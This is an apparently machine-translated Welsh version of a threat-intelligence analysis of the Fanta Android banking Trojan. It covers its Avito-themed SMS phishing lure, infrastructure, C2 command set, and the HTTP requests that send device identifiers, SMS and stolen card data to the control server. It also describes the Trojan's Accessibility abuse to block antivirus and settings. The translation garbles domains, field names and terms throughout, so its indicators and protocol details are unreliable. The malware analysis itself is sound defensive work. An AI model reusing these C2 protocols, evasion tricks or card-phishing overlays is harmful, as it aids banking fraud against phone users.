Un diwrnod rydych chi am werthu rhywbeth ar Avito ac, ar ôl postio disgrifiad manwl o'ch cynnyrch (er enghraifft, modiwl RAM), byddwch yn derbyn y neges hon:
Ar ôl i chi agor y ddolen, fe welwch dudalen sy'n ymddangos yn ddiniwed yn eich hysbysu chi, y gwerthwr hapus a llwyddiannus, bod pryniant wedi'i wneud:
Ar ôl i chi glicio ar y botwm “Parhau”, bydd ffeil APK gydag eicon ac enw sy'n ysbrydoli ymddiriedaeth yn cael ei lawrlwytho i'ch dyfais Android. Fe osodoch chi raglen a oedd am ryw reswm wedi gofyn am hawliau'r Gwasanaeth Hygyrchedd, yna ymddangosodd cwpl o ffenestri a diflannu'n gyflym a... Dyna ni.
Rydych chi'n mynd i wirio'ch balans, ond am ryw reswm mae eich ap banc yn gofyn am fanylion eich cerdyn eto. Ar ôl mynd i mewn i'r data, mae rhywbeth ofnadwy yn digwydd: am ryw reswm yn dal yn aneglur i chi, mae arian yn dechrau diflannu o'ch cyfrif. Rydych chi'n ceisio datrys y broblem, ond mae'ch ffôn yn gwrthsefyll: mae'n pwyso'r bysellau "Yn ôl" a "Cartref", nid yw'n diffodd ac nid yw'n caniatáu ichi actifadu unrhyw fesurau diogelwch. O ganlyniad, rydych chi'n cael eich gadael heb arian, nid yw'ch nwyddau wedi'u prynu, rydych chi wedi drysu ac yn meddwl tybed: beth ddigwyddodd?
Mae'r ateb yn syml: rydych chi wedi dod yn ddioddefwr y Trojan Fanta Android, aelod o'r teulu Flexnet. Sut digwyddodd hyn? Gadewch i ni egluro nawr.
Awduron: Andrey Polovinkin, arbenigwr iau mewn dadansoddi malware, Ivan Pisarev, arbenigwr mewn dadansoddi malware.
Rhai ystadegau
Daeth teulu Flexnet o Android Trojans yn hysbys gyntaf yn ôl yn 2015. Dros gyfnod eithaf hir o weithgaredd, ehangodd y teulu i sawl isrywogaeth: Fanta, Limebot, Lipton, ac ati. Nid yw'r pren Troea, yn ogystal â'r seilwaith sy'n gysylltiedig ag ef, yn aros yn ei unfan: mae cynlluniau dosbarthu effeithiol newydd yn cael eu datblygu - yn ein hachos ni, mae tudalennau gwe-rwydo o ansawdd uchel wedi'u hanelu at ddefnyddiwr-werthwr penodol, ac mae datblygwyr Trojan yn dilyn tueddiadau ffasiynol yn ysgrifennu firws - ychwanegu swyddogaethau newydd sy'n ei gwneud hi'n bosibl dwyn arian yn fwy effeithlon o ddyfeisiau heintiedig a mecanweithiau amddiffyn ffordd osgoi.
Mae'r ymgyrch a ddisgrifir yn yr erthygl hon wedi'i hanelu at ddefnyddwyr o Rwsia; cofnodwyd nifer fach o ddyfeisiau heintiedig yn yr Wcrain, a hyd yn oed llai yn Kazakhstan a Belarus.
Er bod Flexnet wedi bod yn arena Trojan Android ers dros 4 blynedd bellach ac wedi cael ei astudio'n fanwl gan lawer o ymchwilwyr, mae'n dal i fod mewn cyflwr da. Gan ddechrau o fis Ionawr 2019, mae maint y difrod posibl yn fwy na 35 miliwn rubles - a dim ond ar gyfer ymgyrchoedd yn Rwsia y mae hyn. Yn 2015, gwerthwyd fersiynau amrywiol o'r pren Troea Android hwn ar fforymau tanddaearol, lle gellid dod o hyd i god ffynhonnell y pren Troea gyda disgrifiad manwl hefyd. Mae hyn yn golygu bod yr ystadegau difrod yn y byd hyd yn oed yn fwy trawiadol. Ddim yn ddangosydd gwael i hen ddyn o'r fath, ynte?
O werthu i dwyll
Fel y gwelir o'r sgrin a gyflwynwyd yn flaenorol o dudalen gwe-rwydo ar gyfer y gwasanaeth Rhyngrwyd ar gyfer postio hysbysebion Avito, fe'i paratowyd ar gyfer dioddefwr penodol. Yn ôl pob tebyg, mae'r ymosodwyr yn defnyddio un o parsers Avito, sy'n tynnu rhif ffôn ac enw'r gwerthwr, yn ogystal â disgrifiad o'r cynnyrch. Ar ôl ehangu'r dudalen a pharatoi'r ffeil APK, anfonir SMS gyda'i enw at y dioddefwr a dolen i dudalen gwe-rwydo sy'n cynnwys disgrifiad o'i gynnyrch a'r swm a dderbyniwyd o “werthu” y cynnyrch. Trwy glicio ar y botwm, mae'r defnyddiwr yn derbyn ffeil APK maleisus - Fanta.
Dangosodd astudiaeth o barth shcet491[.]ru ei fod yn cael ei ddirprwyo i weinyddion DNS Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Mae'r ffeil parth parth yn cynnwys cofnodion sy'n pwyntio at y cyfeiriadau IP 31.220.23[.]236, 31.220.23[.]243, a 31.220.23[.]235. Fodd bynnag, mae cofnod adnoddau cynradd y parth (cofnod A) yn pwyntio at weinydd gyda chyfeiriad IP 178.132.1[.]240.
Mae cyfeiriad IP 178.132.1[.]240 wedi'i leoli yn yr Iseldiroedd ac mae'n perthyn i'r hoster Ffrwd y Byd. Mae cyfeiriadau IP 31.220.23[.]235, 31.220.23[.]236 a 31.220.23[.]243 wedi'u lleoli yn y DU ac yn perthyn i'r gweinydd cynnal a rennir HOSTINGER. Wedi'i ddefnyddio fel recordydd agoredprov-ru. Datrysodd y parthau canlynol hefyd y cyfeiriad IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Dylid nodi bod dolenni yn y fformat canlynol ar gael o bron bob parth:
http://(www.){0,1}<%domain%>/[0-9]{7}
Mae'r templed hwn hefyd yn cynnwys dolen o neges SMS. Yn seiliedig ar ddata hanesyddol, canfuwyd bod un parth yn cyfateb i sawl dolen yn y patrwm a ddisgrifir uchod, sy'n dangos bod un parth wedi'i ddefnyddio i ddosbarthu'r Trojan i sawl dioddefwr.
Gadewch i ni neidio ymlaen ychydig: mae'r pren Troea sy'n cael ei lawrlwytho trwy ddolen o SMS yn defnyddio'r cyfeiriad fel gweinydd rheoli onusedseddohap[.]clwb. Cofrestrwyd y parth hwn ar 2019-03-12, ac yn dechrau o 2019-04-29, roedd cymwysiadau APK yn rhyngweithio â'r parth hwn. Yn seiliedig ar ddata a gafwyd gan VirusTotal, roedd cyfanswm o 109 o gymwysiadau wedi rhyngweithio â'r gweinydd hwn. Penderfynodd y parth ei hun i'r cyfeiriad IP 217.23.14[.]27, wedi'i leoli yn yr Iseldiroedd ac yn eiddo i'r gwesteiwr Ffrwd y Byd. Wedi'i ddefnyddio fel recordydd enwcheap. Datrysodd parthau i'r cyfeiriad IP hwn hefyd clwb drwg-racoon[.] (yn dechrau o 2018-09-25) a drwg-racoon[.]byw (yn dechrau o 2018-10-25). Gyda parth clwb drwg-racoon[.] rhyngweithio â mwy na 80 o ffeiliau APK drwg-racoon[.]byw - mwy na 100.
Yn gyffredinol, mae'r ymosodiad yn mynd rhagddo fel a ganlyn:
Beth sydd o dan gaead Fanta?
Fel llawer o Trojans Android eraill, mae Fanta yn gallu darllen ac anfon negeseuon SMS, gwneud ceisiadau USSD, ac arddangos ei ffenestri ei hun ar ben cymwysiadau (gan gynnwys rhai bancio). Fodd bynnag, mae arsenal ymarferoldeb y teulu hwn wedi cyrraedd: dechreuodd Fanta ei ddefnyddio Gwasanaeth Hygyrchedd at wahanol ddibenion: darllen cynnwys hysbysiadau o gymwysiadau eraill, atal canfod ac atal gweithredu Trojan ar ddyfais heintiedig, ac ati. Mae Fanta yn gweithio ar bob fersiwn o Android heb fod yn iau na 4.4. Yn yr erthygl hon byddwn yn edrych yn agosach ar y sampl Fanta ganlynol:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Yn syth ar ôl lansio
Yn syth ar ôl ei lansio, mae y pren Troea yn cuddio ei eicon. Dim ond os nad yw enw'r ddyfais heintiedig yn y rhestr y gall y rhaglen weithio:
- android_x86
- VirtualBox
- Nexus 5X (penlletwad)
- Nexus 5 (razor)
Gwneir y gwiriad hwn ym mhrif wasanaeth y pren Troea - Prif Wasanaeth. Pan gaiff ei lansio am y tro cyntaf, mae paramedrau cyfluniad y rhaglen yn cael eu cychwyn i werthoedd diofyn (trafodir y fformat ar gyfer storio data cyfluniad a'u hystyr yn ddiweddarach), ac mae dyfais heintiedig newydd wedi'i chofrestru ar y gweinydd rheoli. Bydd cais HTTP POST gyda'r math o neges yn cael ei anfon at y gweinydd cofrestr_bot a gwybodaeth am y ddyfais heintiedig (fersiwn Android, IMEI, rhif ffôn, enw gweithredwr a chod gwlad y mae'r gweithredwr wedi'i gofrestru ynddi). Mae'r cyfeiriad yn gwasanaethu fel y gweinydd rheoli hXXp://onuseseddohap[.]club/controller.php. Mewn ymateb, mae'r gweinydd yn anfon neges sy'n cynnwys y meysydd bot_id, bot_pwd, gweinydd — mae'r cymhwysiad yn arbed y gwerthoedd hyn fel paramedrau gweinydd CNC. Paramedr gweinydd dewisol os na dderbyniwyd y maes: mae Fanta yn defnyddio'r cyfeiriad cofrestru - hXXp://onuseseddohap[.]club/controller.php. Gellir defnyddio swyddogaeth newid cyfeiriad CNC i ddatrys dwy broblem: i ddosbarthu'r llwyth yn gyfartal rhwng sawl gweinydd (os oes nifer fawr o ddyfeisiau heintiedig, gall y llwyth ar weinydd gwe heb ei optimeiddio fod yn uchel), a hefyd i'w ddefnyddio gweinydd arall os bydd un o weinyddion CNC yn methu .
Os bydd gwall wrth anfon y cais, bydd y pren Troea yn ailadrodd y broses gofrestru ar ôl 20 eiliad.
Unwaith y bydd y ddyfais wedi'i chofrestru'n llwyddiannus, bydd Fanta yn dangos y neges ganlynol i'r defnyddiwr:
Nodyn pwysig: y gwasanaeth a elwir Diogelwch System — enw’r gwasanaeth Trojan, ac ar ôl clicio ar y botwm OK Bydd ffenestr yn agor gyda gosodiadau Hygyrchedd y ddyfais heintiedig, lle mae'n rhaid i'r defnyddiwr roi hawliau Hygyrchedd ar gyfer y gwasanaeth maleisus:
Cyn gynted ag y bydd y defnyddiwr yn troi ymlaen Gwasanaeth Hygyrchedd, Mae Fanta yn cael mynediad i gynnwys ffenestri cymhwysiad a'r gweithredoedd a gyflawnir ynddynt:
Yn syth ar ôl derbyn hawliau Hygyrchedd, mae'r Trojan yn gofyn am hawliau gweinyddwr a hawliau i ddarllen hysbysiadau:
Gan ddefnyddio'r Gwasanaeth Hygyrchedd, mae'r rhaglen yn efelychu trawiadau bysell, gan roi'r holl hawliau angenrheidiol iddo'i hun.
Mae Fanta yn creu nifer o achosion cronfa ddata (a ddisgrifir yn ddiweddarach) sy'n angenrheidiol i storio data cyfluniad, yn ogystal â gwybodaeth a gasglwyd yn y broses am y ddyfais heintiedig. I anfon y wybodaeth a gasglwyd, mae'r Trojan yn creu tasg ailadroddus a gynlluniwyd i lawrlwytho meysydd o'r gronfa ddata a derbyn gorchymyn gan y gweinydd rheoli. Mae'r egwyl ar gyfer cyrchu CNC wedi'i osod yn dibynnu ar y fersiwn Android: yn achos 5.1, yr egwyl fydd 10 eiliad, fel arall 60 eiliad.
I dderbyn y gorchymyn, mae Fanta yn gwneud cais GetTask i'r gweinydd rheoli. Mewn ymateb, gall CNC anfon un o'r gorchmynion canlynol:
| Tîm | Disgrifiad |
|---|---|
| 0 | Anfon neges SMS |
| 1 | Gwnewch alwad ffôn neu orchymyn USSD |
| 2 | Yn diweddaru paramedr cyfwng |
| 3 | Yn diweddaru paramedr rhyng-gipio |
| 6 | Yn diweddaru paramedr smsRheolwr |
| 9 | Dechreuwch gasglu negeseuon SMS |
| 11 | Ailosodwch eich ffôn i osodiadau ffatri |
| 12 | Galluogi/Analluogi logio creu blwch deialog |
Mae Fanta hefyd yn casglu hysbysiadau o 70 o apiau bancio, systemau talu cyflym ac e-waledi ac yn eu storio mewn cronfa ddata.
Storio paramedrau cyfluniad
I storio paramedrau cyfluniad, mae Fanta yn defnyddio dull safonol ar gyfer platfform Android - Dewisiadau-ffeiliau. Bydd y gosodiadau'n cael eu cadw i ffeil a enwir lleoliadau. Mae disgrifiad o'r paramedrau a arbedwyd yn y tabl isod.
| enw | Gwerth diofyn | Gwerthoedd posibl | Disgrifiad |
|---|---|---|---|
| id | 0 | Cyfanrif | ID Bot |
| gweinydd | hXXp://onuseseddohap[.]clwb/ | URL | Cyfeiriad gweinydd rheoli |
| pwd | - | Llinynnau | Cyfrinair gweinydd |
| cyfwng | 20 | Cyfanrif | Cyfnod amser. Yn nodi pa mor hir y dylid gohirio'r tasgau canlynol:
|
| rhyng-gipio | bob | pob/rhif ffôn | Os yw'r cae yn hafal i'r llinyn bob neu telRhif, yna bydd y neges SMS a dderbyniwyd yn cael ei rhyng-gipio gan y cais ac ni ddangosir i'r defnyddiwr |
| smsRheolwr | 0 | 0/1 | Galluogi / analluogi'r cais fel y derbynnydd SMS rhagosodedig |
| darllenDialog | ffug | Gwir/anghywir | Galluogi/Analluogi logio digwyddiadau Digwyddiad Hygyrchedd |
Mae Fanta hefyd yn defnyddio'r ffeil smsRheolwr:
| enw | Gwerth diofyn | Gwerthoedd posibl | Disgrifiad |
|---|---|---|---|
| pckg | - | Llinynnau | Enw'r rheolwr negeseuon SMS a ddefnyddiwyd |
Rhyngweithio â chronfeydd data
Yn ystod ei weithrediad, mae y pren Troea yn defnyddio dwy gronfa ddata. Cronfa ddata wedi'i henwi a defnyddio i storio gwybodaeth amrywiol a gasglwyd o'r ffôn. Enwir yr ail gronfa ddata ffanta.db ac fe'i defnyddir i arbed gosodiadau sy'n gyfrifol am greu ffenestri gwe-rwydo sydd wedi'u cynllunio i gasglu gwybodaeth am gardiau banc.
Mae Trojan yn defnyddio cronfa ddata а i storio gwybodaeth a gasglwyd a chofnodi eich gweithredoedd. Mae data yn cael ei storio mewn tabl Logiau. I greu tabl, defnyddiwch yr ymholiad SQL canlynol:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Mae'r gronfa ddata yn cynnwys y wybodaeth ganlynol:
1. Logio cychwyn y ddyfais heintiedig gyda neges Trodd y ffôn ymlaen!
2. Hysbysiadau o geisiadau. Cynhyrchir y neges yn unol â'r templed canlynol:
(<%App Name%>)<%Title%>: <%Notification text%>
3. data cerdyn banc o ffurflenni gwe-rwydo a grëwyd gan y pren Troea. Paramedr VIEW_NAME gall fod yn un o'r canlynol:
- AliExpress
- Avito
- Google Chwarae
- Amrywiol
Mae'r neges wedi'i logio yn y fformat:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Negeseuon SMS sy'n dod i mewn/allan yn y fformat:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Gwybodaeth am y pecyn sy'n creu'r blwch deialog yn y fformat:
(<%Package name%>)<%Package information%>
Tabl enghreifftiol Logiau:
Un o swyddogaethau Fanta yw casglu gwybodaeth am gardiau banc. Mae casglu data yn digwydd trwy greu ffenestri gwe-rwydo wrth agor cymwysiadau bancio. Mae y pren Troea yn creu y ffenestr gwe-rwydo unwaith yn unig. Mae gwybodaeth y dangoswyd y ffenestr i'r defnyddiwr yn cael ei storio mewn tabl lleoliadau yn y gronfa ddata ffanta.db. I greu cronfa ddata, defnyddiwch yr ymholiad SQL canlynol:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Pob maes bwrdd lleoliadau yn ddiofyn cychwynnwyd i 1 (creu ffenestr gwe-rwydo). Ar ôl i'r defnyddiwr fewnbynnu ei ddata, bydd y gwerth yn cael ei osod i 0. Enghraifft o feysydd tabl lleoliadau:
- can_login — y maes sy'n gyfrifol am arddangos y ffurflen wrth agor cais banc
- banc_cyntaf - na chaiff ei ddefnyddio
- can_avito — y maes sy'n gyfrifol am arddangos y ffurflen wrth agor y cais Avito
- can_ali — y maes sy'n gyfrifol am arddangos y ffurflen wrth agor y cais Aliexpress
- can_arall — y maes sy’n gyfrifol am arddangos y ffurflen wrth agor unrhyw gais o’r rhestr: Yula, Pandao, Drom Auto, Waled. Cardiau disgownt a bonws, Aviasales, Archebu, Trivago
- can_card — y maes sy'n gyfrifol am arddangos y ffurflen wrth agor Google Chwarae
Rhyngweithio â'r gweinydd rheoli
Mae rhyngweithio rhwydwaith â'r gweinydd rheoli yn digwydd trwy'r protocol HTTP. I weithio gyda'r rhwydwaith, mae Fanta yn defnyddio'r llyfrgell ôl-osod boblogaidd. Anfonir ceisiadau at: hXXp://onuseseddohap[.]club/controller.php. Gellir newid cyfeiriad y gweinydd wrth gofrestru ar y gweinydd. Gellir anfon cwcis mewn ymateb gan y gweinydd. Mae Fanta yn gwneud y ceisiadau canlynol i'r gweinydd:
- Mae cofrestru'r bot ar y gweinydd rheoli yn digwydd unwaith, ar ôl ei lansio gyntaf. Anfonir y data canlynol am y ddyfais heintiedig i'r gweinydd:
· Cwci — cwcis a dderbyniwyd gan y gweinydd (mae gwerth diofyn yn llinyn gwag)
· modd - cysonyn llinyn cofrestr_bot
· rhagddodiad - cyfanrif cyson 2
· fersiwn_sdk — yn cael ei ffurfio yn unol â'r templed canlynol: /(Avit)
· ffilm - IMEI y ddyfais heintiedig
· gwlad — cod y wlad y mae'r gweithredwr wedi'i gofrestru ynddi, mewn fformat ISO
· nifer - rhif ffôn
· gweithredwr - enw gweithredwrEnghraifft o gais a anfonwyd at y gweinydd:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Mewn ymateb i'r cais, rhaid i'r gweinydd ddychwelyd gwrthrych JSON sy'n cynnwys y paramedrau canlynol:
· bot_id - ID y ddyfais heintiedig. Os yw bot_id yn hafal i 0, bydd Fanta yn ail-gyflawni'r cais.
bot_pwd - cyfrinair ar gyfer y gweinydd.
gweinydd - cyfeiriad gweinydd rheoli. Paramedr dewisol. Os na nodir y paramedr, bydd y cyfeiriad a gadwyd yn y cais yn cael ei ddefnyddio.Enghraifft o wrthrych JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Cais i dderbyn gorchymyn gan y gweinydd. Anfonir y data canlynol i'r gweinydd:
· Cwci - cwcis a dderbyniwyd gan y gweinydd
· cais — ID y ddyfais heintiedig a dderbyniwyd wrth anfon y cais cofrestr_bot
· pwd —cyfrinair ar gyfer y gweinydd
· divice_admin — mae'r maes yn pennu a gafwyd hawliau gweinyddwr. Os cafwyd hawliau gweinyddwr, mae'r maes yn hafal i 1, fel arall 0
· Hygyrchedd — Statws gweithredu'r Gwasanaeth Hygyrchedd. Os dechreuwyd y gwasanaeth, y gwerth yw 1, fel arall 0
· Rheolwr SMS — yn dangos a yw'r Trojan wedi'i alluogi fel y cymhwysiad rhagosodedig ar gyfer derbyn SMS
· sgrîn — yn dangos ym mha gyflwr y mae'r sgrin. Bydd y gwerth yn cael ei osod 1, os yw'r sgrin ymlaen, fel arall 0;Enghraifft o gais a anfonwyd at y gweinydd:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Yn dibynnu ar y gorchymyn, gall y gweinydd ddychwelyd gwrthrych JSON gyda pharamedrau gwahanol:
· Tîm Anfon neges SMS: Mae'r paramedrau'n cynnwys y rhif ffôn, testun y neges SMS ac ID y neges sy'n cael ei hanfon. Defnyddir y dynodwr wrth anfon neges i'r gweinydd gyda math setSmsStatws.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Tîm Gwnewch alwad ffôn neu orchymyn USSD: Daw'r rhif ffôn neu'r gorchymyn yn y corff ymateb.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Tîm Newid paramedr cyfwng.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Tîm Newid paramedr rhyng-gipio.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Tîm Newid maes SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Tîm Casglwch negeseuon SMS o ddyfais heintiedig.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Tîm Ailosodwch eich ffôn i osodiadau ffatri:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Tîm Newid paramedr ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Anfon neges gyda math setSmsStatws. Gwneir y cais hwn ar ôl i'r gorchymyn gael ei weithredu Anfon neges SMS. Mae'r cais yn edrych fel hyn:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Wrthi'n uwchlwytho cynnwys cronfa ddata. Trosglwyddir un rhes fesul cais. Anfonir y data canlynol i'r gweinydd:
· Cwci - cwcis a dderbyniwyd gan y gweinydd
· modd - cysonyn llinyn setSaveInboxSms
· cais — ID y ddyfais heintiedig a dderbyniwyd wrth anfon y cais cofrestr_bot
· testun — testun yn y cofnod cronfa ddata cyfredol (maes d o'r bwrdd Logiau yn y gronfa ddata а)
· nifer — enw cofnod cyfredol y gronfa ddata (maes p o'r bwrdd Logiau yn y gronfa ddata а)
· modd_sms — gwerth cyfanrif (maes m o'r bwrdd Logiau yn y gronfa ddata а)Mae'r cais yn edrych fel hyn:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Os caiff ei anfon yn llwyddiannus i'r gweinydd, bydd y rhes yn cael ei ddileu o'r tabl. Enghraifft o wrthrych JSON a ddychwelwyd gan y gweinydd:
{ "response":[], "status":"ok" }
Rhyngweithio â'r Gwasanaeth Hygyrchedd
Rhoddwyd y Gwasanaeth Hygyrchedd ar waith i wneud dyfeisiau Android yn haws i bobl ag anableddau eu defnyddio. Yn y rhan fwyaf o achosion, mae angen rhyngweithio corfforol i ryngweithio â chais. Mae'r Gwasanaeth Hygyrchedd yn caniatáu ichi eu gwneud yn rhaglennol. Mae Fanta yn defnyddio'r gwasanaeth i greu ffenestri ffug mewn cymwysiadau bancio ac atal defnyddwyr rhag agor gosodiadau system a rhai cymwysiadau.
Gan ddefnyddio ymarferoldeb y Gwasanaeth Hygyrchedd, mae'r Trojan yn monitro newidiadau i elfennau ar sgrin y ddyfais heintiedig. Fel y disgrifiwyd yn flaenorol, mae gosodiadau Fanta yn cynnwys paramedr sy'n gyfrifol am weithrediadau logio gyda blychau deialog - darllenDialog. Os yw'r paramedr hwn wedi'i osod, bydd gwybodaeth am enw a disgrifiad o'r pecyn a ysgogodd y digwyddiad yn cael ei ychwanegu at y gronfa ddata. Mae'r pren Troea yn cyflawni'r gweithredoedd canlynol pan fydd digwyddiadau'n cael eu sbarduno:
- Yn efelychu gwasgu'r allweddi cefn a chartref yn yr achosion canlynol:
· os yw'r defnyddiwr eisiau ailgychwyn ei ddyfais
· os yw'r defnyddiwr am ddileu'r cymhwysiad “Avito” neu newid hawliau mynediad
· os oes sôn am y cais “Avito” ar y dudalen
· wrth agor y rhaglen Google Play Protect
· wrth agor tudalennau gyda gosodiadau'r Gwasanaeth Hygyrchedd
· pan fydd y blwch deialog Diogelwch System yn ymddangos
· wrth agor y dudalen gyda'r gosodiadau “Draw over other app”.
· wrth agor y dudalen “Ceisiadau”, “Adfer ac ailosod”, “Ailosod data”, “Ailosod gosodiadau”, “Panel Datblygwr”, “Arbennig. cyfleoedd”, “Cyfleoedd arbennig”, “Hawliau arbennig”
· os cafodd y digwyddiad ei gynhyrchu gan rai cymwysiadau.Rhestr o geisiadau
- VIP
- Meistr Lite
- Meistr Glân
- Meistr Glân ar gyfer CPU x86
- Rheoli Caniatâd Cais Meizu
- Diogelwch MIUI
- Clean Master - Gwrthfeirws a Chache a Glanhawr Sbwriel
- Rheolaethau rhieni a GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock a Beta Diogelwch Gwe
- Glanhawr firws, gwrthfeirws, glanhawr (diogelwch MAX)
- Symudol AntiVirus Security PRO
- Antivirus Avast ac amddiffyniad am ddim 2019
- Diogelwch Symudol MegaFon
- Amddiffyn AVG ar gyfer Xperia
- Diogelwch Symudol
- Malwarebytes Gwrthfeirws ac Amddiffyn
- Antivirus ar gyfer Android 2019
- Meistr Diogelwch - Gwrthfeirws, VPN, AppLock, Atgyfnerthu
- Gwrthfeirws AVG ar gyfer Rheolwr System tabled Huawei
- Samsung Hygyrchedd
- Rheolwr Smart Samsung
- Meistr Diogelwch
- Hybu Cyflymder
- Dr.Gwe
- Gofod Diogelwch Dr.Web
- Canolfan Rheoli Symudol Dr.Web
- Dr.Web Diogelwch Gofod Bywyd
- Canolfan Rheoli Symudol Dr.Web
- Diogelwch Gwrthfeirws a Symudol
- Diogelwch Rhyngrwyd Kaspersky: Gwrthfeirws ac Amddiffyn
- Bywyd Batri Kaspersky: Arbedwr a Atgyfnerthu
- Kaspersky Endpoint Security - amddiffyn a rheoli
- AVG Antivirus am ddim 2019 - Amddiffyn ar gyfer Android
- Gwrthfeirws Android
- Norton Symudol Diogelwch a Gwrthfeirws
- Gwrthfeirws, wal dân, VPN, diogelwch symudol
- Diogelwch Symudol: gwrthfeirws, VPN, amddiffyniad rhag lladrad
- Antivirus ar gyfer Android
- Os gofynnir am ganiatâd wrth anfon neges SMS i rif byr, mae Fanta yn efelychu clicio ar y blwch ticio Cofiwch ddewis a botwm i anfon.
- Pan geisiwch dynnu hawliau gweinyddwr oddi ar y pren Troea, mae'n cloi sgrin y ffôn.
- Yn atal ychwanegu gweinyddwyr newydd.
- Os yw'r cais antivirus dr.web canfod bygythiad, mae Fanta yn dynwared pwyso'r botwm anwybyddu.
- Mae y pren Troea yn efelychu pwyso'r botwm cefn a chartref os cafodd y digwyddiad ei gynhyrchu gan y cais Gofal Dyfais Samsung.
- Mae Fanta yn creu ffenestri gwe-rwydo gyda ffurflenni ar gyfer mewnbynnu gwybodaeth am gardiau banc pe bai cais o restr o tua 30 o wasanaethau Rhyngrwyd gwahanol yn cael ei lansio. Yn eu plith: AliExpress, Archebu, Avito, Cydran Marchnad Chwarae Google, Pandao, Drom Auto, ac ati.
Ffurflenni gwe-rwydo
Mae Fanta yn dadansoddi pa gymwysiadau sy'n rhedeg ar y ddyfais heintiedig. Os agorwyd cais o ddiddordeb, mae'r Trojan yn dangos ffenestr gwe-rwydo ar ben pob un arall, sef ffurflen ar gyfer mewnbynnu gwybodaeth cerdyn banc. Rhaid i'r defnyddiwr nodi'r data canlynol:
- Rhif cerdyn
- Dyddiad dod i ben y cerdyn
- CVV
- Enw deiliad y cerdyn (ddim ar gyfer pob banc)
Yn dibynnu ar y rhaglen redeg, bydd gwahanol ffenestri gwe-rwydo yn cael eu harddangos. Isod mae enghreifftiau o rai ohonynt:
AliExpress:
Avito:
Ar gyfer rhai cymwysiadau eraill, e.e. Marchnad Chwarae Google, Aviasales, Pandao, Archebu, Trivago:
Sut yr oedd mewn gwirionedd
Yn ffodus, trodd y person a dderbyniodd y neges SMS a ddisgrifiwyd ar ddechrau'r erthygl yn arbenigwr seiberddiogelwch. Felly, mae'r fersiwn go iawn nad yw'n gyfarwyddwr yn wahanol i'r un a ddywedwyd yn gynharach: derbyniodd person SMS diddorol, ac ar ôl hynny fe'i rhoddodd i dîm Cudd-wybodaeth Hela Bygythiad Grŵp-IB. Canlyniad yr ymosodiad yw'r erthygl hon. Diweddglo hapus, iawn? Fodd bynnag, nid yw pob stori yn gorffen mor llwyddiannus, ac fel nad yw'ch un chi yn edrych fel toriad cyfarwyddwr gyda cholled arian, yn y rhan fwyaf o achosion mae'n ddigon cadw at y rheolau hir-ddisgrifiedig canlynol:
- peidiwch â gosod cymwysiadau ar gyfer dyfais symudol gydag Android OS o unrhyw ffynonellau heblaw Google Play
- Wrth osod cais, rhowch sylw arbennig i'r hawliau y mae'r cais yn gofyn amdanynt
- rhowch sylw i estyniadau ffeiliau wedi'u llwytho i lawr
- gosod diweddariadau Android OS yn rheolaidd
- peidiwch ag ymweld ag adnoddau amheus a pheidiwch â lawrlwytho ffeiliau oddi yno
- Peidiwch â chlicio ar ddolenni a dderbyniwyd mewn negeseuon SMS.
Ffynhonnell: hab.com